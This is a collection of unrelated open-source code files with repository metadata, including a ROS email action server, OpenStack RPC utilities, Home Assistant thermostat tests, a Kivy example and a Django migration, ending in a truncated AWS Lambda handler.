return loader.load_module(modname)
LOGGER.warning("Can not load Python module '%s' from '%s'", modname, path)
|
{
"content_hash": "58c2f0b3d402e7126d0c25eaf29116ed",
"timestamp": "",
"source": "github",
"line_count": 283,
"max_line_length": 104,
"avg_line_length": 29.480565371024735,
"alnum_prop": 0.5975068920052738,
"repo_name": "werdeil/pibooth",
"id": "aeab1c6e2a5fad4d5ec371163056a1ce8be7d508",
"size": "8368",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pibooth/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "198628"
},
{
"name": "Shell",
"bytes": "1980"
}
],
"symlink_target": ""
}
|
import rospy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import actionlib
import strands_emails.msg
class emailServer(object):
_feedback = strands_emails.msg.SendEmailFeedback()
_result = strands_emails.msg.SendEmailResult()
def __init__(self, name):
self.cancelled = False
self._action_name = name
self.from_add = rospy.get_param("~from_add",'robot@strands.eu')
self.smtp_add = rospy.get_param("~smtp_add",'localhost:25')
rospy.loginfo("Creating action server.")
self._as = actionlib.SimpleActionServer(self._action_name, strands_emails.msg.SendEmailAction, execute_cb = self.executeCallback, auto_start = False)
self._as.register_preempt_callback(self.preemptCallback)
rospy.loginfo(" ...starting")
self._as.start()
rospy.loginfo(" ...done")
rospy.loginfo("Ready to Tweet ...")
rospy.spin()
def _send_email(self, goal):
self.cancelled = False
me = self.from_add
msg = MIMEMultipart('alternative')
msg['Subject'] = goal.subject
msg['From'] = me
msg['To'] = goal.to_address
texts = "%s"%goal.text
part1 = MIMEText(texts, 'plain')
msg.attach(part1)
server = smtplib.SMTP(self.smtp_add)
server.sendmail(me, goal.to_address, msg.as_string())
server.quit()
return True
def executeCallback(self, goal):
self._feedback.senttext = 'Sending...'
self._as.publish_feedback(self._feedback)
rospy.loginfo('%s: sending %s' % (self._action_name, goal.text))
result=self._send_email(goal)
self._result.success = result
self._feedback.senttext = goal.text
self._as.publish_feedback(self._feedback)
self._as.set_succeeded(self._result)
def preemptCallback(self):
self.cancelled = True
self._result.success = False
self._as.set_preempted(self._result)
if __name__ == '__main__':
rospy.init_node('strands_emails')
server = emailServer(rospy.get_name())
|
{
"content_hash": "65a4dd33c9af0342ce10df893e79f539",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 157,
"avg_line_length": 30.323943661971832,
"alnum_prop": 0.6196005573618207,
"repo_name": "cburbridge/strands_apps",
"id": "fa15f1ec09e65bc38232b141331f078f34ab332d",
"size": "2176",
"binary": false,
"copies": "1",
"ref": "refs/heads/hydro-devel",
"path": "strands_emails/scripts/send_emails.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "32677"
},
{
"name": "CMake",
"bytes": "17282"
},
{
"name": "Python",
"bytes": "41465"
},
{
"name": "Shell",
"bytes": "649"
}
],
"symlink_target": ""
}
|
import copy
import sys
import traceback
from oslo.config import cfg
import six
from designate.openstack.common.gettextutils import _
from designate.openstack.common import importutils
from designate.openstack.common import jsonutils
from designate.openstack.common import local
from designate.openstack.common import log as logging
from designate.openstack.common import versionutils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
_RPC_ENVELOPE_VERSION = '2.0'
'''RPC Envelope Version.
This version number applies to the top level structure of messages sent out.
It does *not* apply to the message payload, which must be versioned
independently. For example, when using rpc APIs, a version number is applied
for changes to the API being exposed over rpc. This version number is handled
in the rpc proxy and dispatcher modules.
This version number applies to the message envelope that is used in the
serialization done inside the rpc layer. See serialize_msg() and
deserialize_msg().
The current message format (version 2.0) is very simple. It is::
{
'oslo.version': <RPC Envelope Version as a String>,
'oslo.message': <Application Message Payload, JSON encoded>
}
Message format version '1.0' is just considered to be the messages we sent
without a message envelope.
So, the current message envelope just includes the envelope version. It may
eventually contain additional information, such as a signature for the message
payload.
We will JSON encode the application message payload. The message envelope,
which includes the JSON encoded application message body, will be passed down
to the messaging libraries as a dict.
'''
_VERSION_KEY = 'oslo.version'
_MESSAGE_KEY = 'oslo.message'
_REMOTE_POSTFIX = '_Remote'
class RPCException(Exception):
msg_fmt = _("An unknown RPC related exception occurred.")
def __init__(self, message=None, **kwargs):
self.kwargs = kwargs
if not message:
try:
message = self.msg_fmt % kwargs
except Exception:
# kwargs doesn't match a variable in the message
# log the issue and the kwargs
LOG.exception(_('Exception in string format operation'))
for name, value in six.iteritems(kwargs):
LOG.error("%s: %s" % (name, value))
# at least get the core message out if something happened
message = self.msg_fmt
super(RPCException, self).__init__(message)
class RemoteError(RPCException):
"""Signifies that a remote class has raised an exception.
Contains a string representation of the type of the original exception,
the value of the original exception, and the traceback. These are
sent to the parent as a joined string so printing the exception
contains all of the relevant info.
"""
msg_fmt = _("Remote error: %(exc_type)s %(value)s\n%(traceback)s.")
def __init__(self, exc_type=None, value=None, traceback=None):
self.exc_type = exc_type
self.value = value
self.traceback = traceback
super(RemoteError, self).__init__(exc_type=exc_type,
value=value,
traceback=traceback)
class Timeout(RPCException):
"""Signifies that a timeout has occurred.
This exception is raised if the rpc_response_timeout is reached while
waiting for a response from the remote side.
"""
msg_fmt = _('Timeout while waiting on RPC response - '
'topic: "%(topic)s", RPC method: "%(method)s" '
'info: "%(info)s"')
def __init__(self, info=None, topic=None, method=None):
"""Initiates Timeout object.
:param info: Extra info to convey to the user
:param topic: The topic that the rpc call was sent to
:param rpc_method_name: The name of the rpc method being
called
"""
self.info = info
self.topic = topic
self.method = method
super(Timeout, self).__init__(
None,
info=info or _('<unknown>'),
topic=topic or _('<unknown>'),
method=method or _('<unknown>'))
class DuplicateMessageError(RPCException):
msg_fmt = _("Found duplicate message(%(msg_id)s). Skipping it.")
class InvalidRPCConnectionReuse(RPCException):
msg_fmt = _("Invalid reuse of an RPC connection.")
class UnsupportedRpcVersion(RPCException):
msg_fmt = _("Specified RPC version, %(version)s, not supported by "
"this endpoint.")
class UnsupportedRpcEnvelopeVersion(RPCException):
msg_fmt = _("Specified RPC envelope version, %(version)s, "
"not supported by this endpoint.")
class RpcVersionCapError(RPCException):
msg_fmt = _("Specified RPC version cap, %(version_cap)s, is too low")
class Connection(object):
"""A connection, returned by rpc.create_connection().
This class represents a connection to the message bus used for rpc.
An instance of this class should never be created by users of the rpc API.
Use rpc.create_connection() instead.
"""
def close(self):
"""Close the connection.
This method must be called when the connection will no longer be used.
It will ensure that any resources associated with the connection, such
as a network connection, and cleaned up.
"""
raise NotImplementedError()
def create_consumer(self, topic, proxy, fanout=False):
"""Create a consumer on this connection.
A consumer is associated with a message queue on the backend message
bus. The consumer will read messages from the queue, unpack them, and
dispatch them to the proxy object. The contents of the message pulled
off of the queue will determine which method gets called on the proxy
object.
:param topic: This is a name associated with what to consume from.
Multiple instances of a service may consume from the same
topic. For example, all instances of nova-compute consume
from a queue called "compute". In that case, the
messages will get distributed amongst the consumers in a
round-robin fashion if fanout=False. If fanout=True,
every consumer associated with this topic will get a
copy of every message.
:param proxy: The object that will handle all incoming messages.
:param fanout: Whether or not this is a fanout topic. See the
documentation for the topic parameter for some
additional comments on this.
"""
raise NotImplementedError()
def create_worker(self, topic, proxy, pool_name):
"""Create a worker on this connection.
A worker is like a regular consumer of messages directed to a
topic, except that it is part of a set of such consumers (the
"pool") which may run in parallel. Every pool of workers will
receive a given message, but only one worker in the pool will
be asked to process it. Load is distributed across the members
of the pool in round-robin fashion.
:param topic: This is a name associated with what to consume from.
Multiple instances of a service may consume from the same
topic.
:param proxy: The object that will handle all incoming messages.
:param pool_name: String containing the name of the pool of workers
"""
raise NotImplementedError()
def join_consumer_pool(self, callback, pool_name, topic, exchange_name):
"""Register as a member of a group of consumers.
Uses given topic from the specified exchange.
Exactly one member of a given pool will receive each message.
A message will be delivered to multiple pools, if more than
one is created.
:param callback: Callable to be invoked for each message.
:type callback: callable accepting one argument
:param pool_name: The name of the consumer pool.
:type pool_name: str
:param topic: The routing topic for desired messages.
:type topic: str
:param exchange_name: The name of the message exchange where
the client should attach. Defaults to
the configured exchange.
:type exchange_name: str
"""
raise NotImplementedError()
def consume_in_thread(self):
"""Spawn a thread to handle incoming messages.
Spawn a thread that will be responsible for handling all incoming
messages for consumers that were set up on this connection.
Message dispatching inside of this is expected to be implemented in a
non-blocking manner. An example implementation would be having this
thread pull messages in for all of the consumers, but utilize a thread
pool for dispatching the messages to the proxy objects.
"""
raise NotImplementedError()
def _safe_log(log_func, msg, msg_data):
"""Sanitizes the msg_data field before logging."""
SANITIZE = ['_context_auth_token', 'auth_token', 'new_pass']
def _fix_passwords(d):
"""Sanitizes the password fields in the dictionary."""
for k in six.iterkeys(d):
if k.lower().find('password') != -1:
d[k] = '<SANITIZED>'
elif k.lower() in SANITIZE:
d[k] = '<SANITIZED>'
elif isinstance(d[k], list):
for e in d[k]:
if isinstance(e, dict):
_fix_passwords(e)
elif isinstance(d[k], dict):
_fix_passwords(d[k])
return d
return log_func(msg, _fix_passwords(copy.deepcopy(msg_data)))
def serialize_remote_exception(failure_info, log_failure=True):
"""Prepares exception data to be sent over rpc.
Failure_info should be a sys.exc_info() tuple.
"""
tb = traceback.format_exception(*failure_info)
failure = failure_info[1]
if log_failure:
LOG.error(_("Returning exception %s to caller"),
six.text_type(failure))
LOG.error(tb)
kwargs = {}
if hasattr(failure, 'kwargs'):
kwargs = failure.kwargs
# NOTE(matiu): With cells, it's possible to re-raise remote, remote
# exceptions. Lets turn it back into the original exception type.
cls_name = str(failure.__class__.__name__)
mod_name = str(failure.__class__.__module__)
if (cls_name.endswith(_REMOTE_POSTFIX) and
mod_name.endswith(_REMOTE_POSTFIX)):
cls_name = cls_name[:-len(_REMOTE_POSTFIX)]
mod_name = mod_name[:-len(_REMOTE_POSTFIX)]
data = {
'class': cls_name,
'module': mod_name,
'message': six.text_type(failure),
'tb': tb,
'args': failure.args,
'kwargs': kwargs
}
json_data = jsonutils.dumps(data)
return json_data
def deserialize_remote_exception(conf, data):
failure = jsonutils.loads(str(data))
trace = failure.get('tb', [])
message = failure.get('message', "") + "\n" + "\n".join(trace)
name = failure.get('class')
module = failure.get('module')
# NOTE(ameade): We DO NOT want to allow just any module to be imported, in
# order to prevent arbitrary code execution.
if module not in conf.allowed_rpc_exception_modules:
return RemoteError(name, failure.get('message'), trace)
try:
mod = importutils.import_module(module)
klass = getattr(mod, name)
if not issubclass(klass, Exception):
raise TypeError("Can only deserialize Exceptions")
failure = klass(*failure.get('args', []), **failure.get('kwargs', {}))
except (AttributeError, TypeError, ImportError):
return RemoteError(name, failure.get('message'), trace)
ex_type = type(failure)
str_override = lambda self: message
new_ex_type = type(ex_type.__name__ + _REMOTE_POSTFIX, (ex_type,),
{'__str__': str_override, '__unicode__': str_override})
new_ex_type.__module__ = '%s%s' % (module, _REMOTE_POSTFIX)
try:
# NOTE(ameade): Dynamically create a new exception type and swap it in
# as the new type for the exception. This only works on user defined
# Exceptions and not core python exceptions. This is important because
# we cannot necessarily change an exception message so we must override
# the __str__ method.
failure.__class__ = new_ex_type
except TypeError:
# NOTE(ameade): If a core exception then just add the traceback to the
# first exception argument.
failure.args = (message,) + failure.args[1:]
return failure
class CommonRpcContext(object):
def __init__(self, **kwargs):
self.values = kwargs
def __getattr__(self, key):
try:
return self.values[key]
except KeyError:
raise AttributeError(key)
def to_dict(self):
return copy.deepcopy(self.values)
@classmethod
def from_dict(cls, values):
return cls(**values)
def deepcopy(self):
return self.from_dict(self.to_dict())
def update_store(self):
local.store.context = self
def elevated(self, read_deleted=None, overwrite=False):
"""Return a version of this context with admin flag set."""
# TODO(russellb) This method is a bit of a nova-ism. It makes
# some assumptions about the data in the request context sent
# across rpc, while the rest of this class does not. We could get
# rid of this if we changed the nova code that uses this to
# convert the RpcContext back to its native RequestContext doing
# something like nova.context.RequestContext.from_dict(ctxt.to_dict())
context = self.deepcopy()
context.values['is_admin'] = True
context.values.setdefault('roles', [])
if 'admin' not in context.values['roles']:
context.values['roles'].append('admin')
if read_deleted is not None:
context.values['read_deleted'] = read_deleted
return context
class ClientException(Exception):
"""Encapsulates actual exception expected to be hit by a RPC proxy object.
Merely instantiating it records the current exception information, which
will be passed back to the RPC client without exceptional logging.
"""
def __init__(self):
self._exc_info = sys.exc_info()
def catch_client_exception(exceptions, func, *args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
if type(e) in exceptions:
raise ClientException()
else:
raise
def client_exceptions(*exceptions):
"""Decorator for manager methods that raise expected exceptions.
Marking a Manager method with this decorator allows the declaration
of expected exceptions that the RPC layer should not consider fatal,
and not log as if they were generated in a real error scenario. Note
that this will cause listed exceptions to be wrapped in a
ClientException, which is used internally by the RPC layer.
"""
def outer(func):
def inner(*args, **kwargs):
return catch_client_exception(exceptions, func, *args, **kwargs)
return inner
return outer
# TODO(sirp): we should deprecate this in favor of
# using `versionutils.is_compatible` directly
def version_is_compatible(imp_version, version):
"""Determine whether versions are compatible.
:param imp_version: The version implemented
:param version: The version requested by an incoming message.
"""
return versionutils.is_compatible(version, imp_version)
def serialize_msg(raw_msg):
# NOTE(russellb) See the docstring for _RPC_ENVELOPE_VERSION for more
# information about this format.
msg = {_VERSION_KEY: _RPC_ENVELOPE_VERSION,
_MESSAGE_KEY: jsonutils.dumps(raw_msg)}
return msg
def deserialize_msg(msg):
# NOTE(russellb): Hang on to your hats, this road is about to
# get a little bumpy.
#
# Robustness Principle:
# "Be strict in what you send, liberal in what you accept."
#
# At this point we have to do a bit of guessing about what it
# is we just received. Here is the set of possibilities:
#
# 1) We received a dict. This could be 2 things:
#
# a) Inspect it to see if it looks like a standard message envelope.
# If so, great!
#
# b) If it doesn't look like a standard message envelope, it could either
# be a notification, or a message from before we added a message
# envelope (referred to as version 1.0).
# Just return the message as-is.
#
# 2) It's any other non-dict type. Just return it and hope for the best.
# This case covers return values from rpc.call() from before message
# envelopes were used. (messages to call a method were always a dict)
if not isinstance(msg, dict):
# See #2 above.
return msg
base_envelope_keys = (_VERSION_KEY, _MESSAGE_KEY)
if not all(map(lambda key: key in msg, base_envelope_keys)):
# See #1.b above.
return msg
# At this point we think we have the message envelope
# format we were expecting. (#1.a above)
if not version_is_compatible(_RPC_ENVELOPE_VERSION, msg[_VERSION_KEY]):
raise UnsupportedRpcEnvelopeVersion(version=msg[_VERSION_KEY])
raw_msg = jsonutils.loads(msg[_MESSAGE_KEY])
return raw_msg
|
{
"content_hash": "f54fa21c828c9e62c9a7589ae08182a3",
"timestamp": "",
"source": "github",
"line_count": 491,
"max_line_length": 79,
"avg_line_length": 36.30346232179226,
"alnum_prop": 0.6412903225806451,
"repo_name": "NeCTAR-RC/designate",
"id": "8c7ff1f3855dad690fa67466a6874330bc174d3e",
"size": "18588",
"binary": false,
"copies": "1",
"ref": "refs/heads/nectar/icehouse",
"path": "designate/openstack/common/rpc/common.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1402878"
},
{
"name": "Shell",
"bytes": "3809"
}
],
"symlink_target": ""
}
|
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
setup(
name = 'django-localflavor-si',
version = '1.0',
description = 'Country-specific Django helpers for Slovenia.',
long_description = README,
author = 'Django Software Foundation',
author_email = 'foundation@djangoproject.com',
license='BSD',
url = 'https://github.com/django/django-localflavor-si',
packages = ['django_localflavor_si'],
include_package_data = True,
classifiers = [
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
],
install_requires=[
'Django>=1.4',
]
)
|
{
"content_hash": "59c44ef66d492e890b7e6d1c8853703b",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 75,
"avg_line_length": 31.655172413793103,
"alnum_prop": 0.6252723311546841,
"repo_name": "klemensavli/django-localflavor-si",
"id": "b86d9c2d4edb03567b5e189d0486f5e4780f579a",
"size": "918",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "42232"
}
],
"symlink_target": ""
}
|
'''
Rotation Example
================
This example rotates a button using PushMatrix and PopMatrix. You should see
a static button with the words 'hello world' rotated at a 45 degree angle.
'''
from kivy.app import App
from kivy.lang import Builder
kv = '''
FloatLayout:
Button:
text: 'hello world'
size_hint: None, None
pos_hint: {'center_x': .5, 'center_y': .5}
canvas.before:
PushMatrix
Rotate:
angle: 45
origin: self.center
canvas.after:
PopMatrix
'''
class RotationApp(App):
def build(self):
return Builder.load_string(kv)
RotationApp().run()
|
{
"content_hash": "c630d092fbcaa253ed4bd6fde98fc37f",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 76,
"avg_line_length": 19.457142857142856,
"alnum_prop": 0.580029368575624,
"repo_name": "bionoid/kivy",
"id": "68bf0fbba398ded61abfc18e33727dbf48ed2465",
"size": "681",
"binary": false,
"copies": "21",
"ref": "refs/heads/master",
"path": "examples/canvas/rotation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "321844"
},
{
"name": "C++",
"bytes": "3551"
},
{
"name": "Emacs Lisp",
"bytes": "9671"
},
{
"name": "GLSL",
"bytes": "323"
},
{
"name": "Makefile",
"bytes": "4084"
},
{
"name": "Objective-C",
"bytes": "14779"
},
{
"name": "Python",
"bytes": "4026579"
},
{
"name": "Shell",
"bytes": "356"
},
{
"name": "Vim script",
"bytes": "1731"
}
],
"symlink_target": ""
}
|
"""The tests for the heat control thermostat."""
import unittest
from unittest import mock
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ON,
STATE_OFF,
TEMP_CELCIUS,
)
from homeassistant.components import thermostat
import homeassistant.components.thermostat.heat_control as heat_control
from tests.common import get_test_home_assistant
ENTITY = 'thermostat.test'
ENT_SENSOR = 'sensor.test'
ENT_SWITCH = 'switch.test'
MIN_TEMP = 3.0
MAX_TEMP = 65.0
TARGET_TEMP = 42.0
class TestSetupThermostatHeatControl(unittest.TestCase):
"""Test the Heat Control thermostat with custom config."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_setup_missing_conf(self):
"""Test set up heat_control with missing config values."""
config = {
'name': 'test',
'target_sensor': ENT_SENSOR
}
add_devices = mock.MagicMock()
result = heat_control.setup_platform(self.hass, config, add_devices)
self.assertEqual(False, result)
def test_setup_with_sensor(self):
"""Test set up heat_control with sensor to trigger update at init."""
self.hass.states.set(ENT_SENSOR, 22.0, {
ATTR_UNIT_OF_MEASUREMENT: TEMP_CELCIUS
})
thermostat.setup(self.hass, {'thermostat': {
'platform': 'heat_control',
'name': 'test',
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR
}})
state = self.hass.states.get(ENTITY)
self.assertEqual(
TEMP_CELCIUS, state.attributes.get('unit_of_measurement'))
self.assertEqual(22.0, state.attributes.get('current_temperature'))
class TestThermostatHeatControl(unittest.TestCase):
"""Test the Heat Control thermostat."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.hass.config.temperature_unit = TEMP_CELCIUS
thermostat.setup(self.hass, {'thermostat': {
'platform': 'heat_control',
'name': 'test',
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR
}})
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_setup_defaults_to_unknown(self):
"""Test the setting of defaults to unknown."""
self.assertEqual('unknown', self.hass.states.get(ENTITY).state)
def test_default_setup_params(self):
"""Test the setup with default parameters."""
state = self.hass.states.get(ENTITY)
self.assertEqual(7, state.attributes.get('min_temp'))
self.assertEqual(35, state.attributes.get('max_temp'))
self.assertEqual(None, state.attributes.get('temperature'))
def test_custom_setup_params(self):
"""Test the setup with custom parameters."""
thermostat.setup(self.hass, {'thermostat': {
'platform': 'heat_control',
'name': 'test',
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR,
'min_temp': MIN_TEMP,
'max_temp': MAX_TEMP,
'target_temp': TARGET_TEMP
}})
state = self.hass.states.get(ENTITY)
self.assertEqual(MIN_TEMP, state.attributes.get('min_temp'))
self.assertEqual(MAX_TEMP, state.attributes.get('max_temp'))
self.assertEqual(TARGET_TEMP, state.attributes.get('temperature'))
self.assertEqual(str(TARGET_TEMP), self.hass.states.get(ENTITY).state)
def test_set_target_temp(self):
"""Test the setting of the target temperature."""
thermostat.set_temperature(self.hass, 30)
self.hass.pool.block_till_done()
self.assertEqual('30.0', self.hass.states.get(ENTITY).state)
def test_sensor_bad_unit(self):
"""Test sensor that have bad unit."""
self._setup_sensor(22.0, unit='bad_unit')
self.hass.pool.block_till_done()
state = self.hass.states.get(ENTITY)
self.assertEqual(None, state.attributes.get('unit_of_measurement'))
self.assertEqual(None, state.attributes.get('current_temperature'))
def test_sensor_bad_value(self):
"""Test sensor that have None as state."""
self._setup_sensor(None)
self.hass.pool.block_till_done()
state = self.hass.states.get(ENTITY)
self.assertEqual(None, state.attributes.get('unit_of_measurement'))
self.assertEqual(None, state.attributes.get('current_temperature'))
def test_set_target_temp_heater_on(self):
"""Test if target temperature turn heater on."""
self._setup_switch(False)
self._setup_sensor(25)
self.hass.pool.block_till_done()
thermostat.set_temperature(self.hass, 30)
self.hass.pool.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_set_target_temp_heater_off(self):
"""Test if target temperature turn heater off."""
self._setup_switch(True)
self._setup_sensor(30)
self.hass.pool.block_till_done()
thermostat.set_temperature(self.hass, 25)
self.hass.pool.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_set_temp_change_heater_on(self):
"""Test if temperature change turn heater on."""
self._setup_switch(False)
thermostat.set_temperature(self.hass, 30)
self.hass.pool.block_till_done()
self._setup_sensor(25)
self.hass.pool.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_heater_off(self):
"""Test if temperature change turn heater off."""
self._setup_switch(True)
thermostat.set_temperature(self.hass, 25)
self.hass.pool.block_till_done()
self._setup_sensor(30)
self.hass.pool.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def _setup_sensor(self, temp, unit=TEMP_CELCIUS):
"""Setup the test sensor."""
self.hass.states.set(ENT_SENSOR, temp, {
ATTR_UNIT_OF_MEASUREMENT: unit
})
def _setup_switch(self, is_on):
"""Setup the test switch."""
self.hass.states.set(ENT_SWITCH, STATE_ON if is_on else STATE_OFF)
self.calls = []
def log_call(call):
"""Log service calls."""
self.calls.append(call)
self.hass.services.register('switch', SERVICE_TURN_ON, log_call)
self.hass.services.register('switch', SERVICE_TURN_OFF, log_call)
|
{
"content_hash": "b2e0d7805588ac725bb53c784b9166f6",
"timestamp": "",
"source": "github",
"line_count": 201,
"max_line_length": 78,
"avg_line_length": 38.09950248756219,
"alnum_prop": 0.626926090363019,
"repo_name": "luxus/home-assistant",
"id": "cb75c72f8ca9fea8746bf87f55e4cdfd5541dd09",
"size": "7658",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "tests/components/thermostat/test_heat_control.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "814604"
},
{
"name": "Python",
"bytes": "938037"
},
{
"name": "Shell",
"bytes": "3681"
}
],
"symlink_target": ""
}
|
import importlib.machinery
SUFFIXES = [
('Source:', importlib.machinery.SOURCE_SUFFIXES),
('Debug:',
importlib.machinery.DEBUG_BYTECODE_SUFFIXES),
('Optimized:',
importlib.machinery.OPTIMIZED_BYTECODE_SUFFIXES),
('Bytecode:', importlib.machinery.BYTECODE_SUFFIXES),
('Extension:', importlib.machinery.EXTENSION_SUFFIXES),
]
def main():
tmpl = '{:<10} {}'
for name, value in SUFFIXES:
print(tmpl.format(name, value))
if __name__ == '__main__':
main()
|
{
"content_hash": "03999685adf554e8672172be90aed517",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 59,
"avg_line_length": 25.2,
"alnum_prop": 0.6448412698412699,
"repo_name": "gaufung/PythonStandardLibrary",
"id": "1104619caa5ff0d6a634e495bbd055e076e9d2b0",
"size": "504",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ModuleAndPackage/importlib/importlib_suffixes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "3175176"
},
{
"name": "Python",
"bytes": "70796"
}
],
"symlink_target": ""
}
|
"""
Given an array of non-negative integers, you are initially positioned at the
first index of the array.
Each element in the array represents your maximum jump length at that
position.
Your goal is to reach the last index in the minimum number of jumps.
For example:
Given array A = [2,3,1,1,4]
The minimum number of jumps to reach the last index is 2. (Jump 1 step from
index 0 to 1, then 3 steps to the last index.)
"""
class Solution(object):
def jump(self, nums):
"""
:type nums: List[int]
:rtype: int
Time Limit Exceeded
"""
n = len(nums)
# t[i] means mininum number of jumps to nums[i]
t = [-1 for i in range(n)]
t[0] = 0
if n == 1:
return 1
for i in range(n):
steps = nums[i]
end = min(i + steps, n - 1)
for j in range(i + 1, end + 1):
if t[j] == -1:
t[j] = t[i] + 1
else:
t[j] = min(t[i] + 1, t[j])
return t[-1]
a1 = [2, 3, 1, 1, 4]
s = Solution()
print(s.jump(a1))
|
{
"content_hash": "793e48bca46ff527c3a51306111ee42b",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 76,
"avg_line_length": 25.09090909090909,
"alnum_prop": 0.5226449275362319,
"repo_name": "shichao-an/leetcode-python",
"id": "391b909efc6d8f3996ad7ada419b9de11567195d",
"size": "1104",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "jump_game_ii/solution3.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "228552"
},
{
"name": "Shell",
"bytes": "353"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations
from django import VERSION as DJANGO_VERSION
def populate_static_pages(apps, schema_editor):
RawHTMLPage = apps.get_model('cms_pages.RawHTMLPage')
ContentType = apps.get_model('contenttypes.ContentType')
HomePage = apps.get_model('cms_pages.HomePage')
HomePageTopMenuLink = apps.get_model('cms_pages.HomePageTopMenuLink')
raw_html_page_content_type, _ = ContentType.objects.get_or_create(
model='rawhtmlpage',
app_label='cms_pages',
defaults={'name': 'rawhtmlpage'} if DJANGO_VERSION < (1, 8) else {}
)
home_page = HomePage.objects.all()[0]
# Create about page
about_page = RawHTMLPage.objects.create(
title="Декларації: Про проект",
slug='about',
content_type=raw_html_page_content_type,
path='000100010001',
depth=3,
numchild=0,
body="""
<p>Вас вітає проект Канцелярської сотні — «Гарнахата».</p>
""",
url_path='/home/about/',
)
# Create API page
api_page = RawHTMLPage.objects.create(
title="ГарнаХата: Відкритий API",
slug='api',
content_type=raw_html_page_content_type,
path='000100010002',
depth=3,
numchild=0,
body="""
<p>Тут колись буде про наше API</p>
""",
url_path='/home/api/',
)
HomePageTopMenuLink.objects.create(
caption="Головна",
link_external="/",
sort_order=0,
page_id=home_page.id
)
HomePageTopMenuLink.objects.create(
caption="Про проект",
link_page_id=about_page.id,
sort_order=3,
page_id=home_page.id
)
HomePageTopMenuLink.objects.create(
caption="Відкритий API",
link_page_id=api_page.id,
sort_order=4,
page_id=home_page.id
)
home_page.depth = 2
home_page.numchild = 2
home_page.save()
class Migration(migrations.Migration):
dependencies = [
('cms_pages', '0002_auto_20150702_0240'),
]
operations = [
migrations.RunPython(populate_static_pages),
]
|
{
"content_hash": "4d74558a88be341cb1f0d6aafff20f2b",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 75,
"avg_line_length": 25.83132530120482,
"alnum_prop": 0.6072761194029851,
"repo_name": "dchaplinsky/garnahata.in.ua",
"id": "4de9166907f21d4f4ae5cd3c8b50748aae93d6c5",
"size": "2295",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "garnahata_site/cms_pages/migrations/0003_auto_20150702_0241.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "24360"
},
{
"name": "Dockerfile",
"bytes": "2329"
},
{
"name": "HTML",
"bytes": "82807"
},
{
"name": "JavaScript",
"bytes": "168113"
},
{
"name": "Python",
"bytes": "152194"
},
{
"name": "Shell",
"bytes": "1071"
}
],
"symlink_target": ""
}
|
import trollius as asyncio
import boto3
from concurrent.futures import ThreadPoolExecutor
from poll import Poll
from update_and_delete import UpdateAndDelete
import logging
logging.getLogger(
'botocore.vendored.requests.packages.urllib3.connectionpool'
).setLevel(logging.CRITICAL)
logging.getLogger('boto3.resources.action').setLevel(logging.CRITICAL)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
session = boto3.session.Session(region_name='ap-northeast-1')
sqs = session.resource('sqs')
sqs_client = sqs.meta.client
db = session.resource('dynamodb').meta.client
def handler(event, contest):
logger.info("Start!")
executor = ThreadPoolExecutor(max_workers=1000)
main_loop = asyncio.new_event_loop()
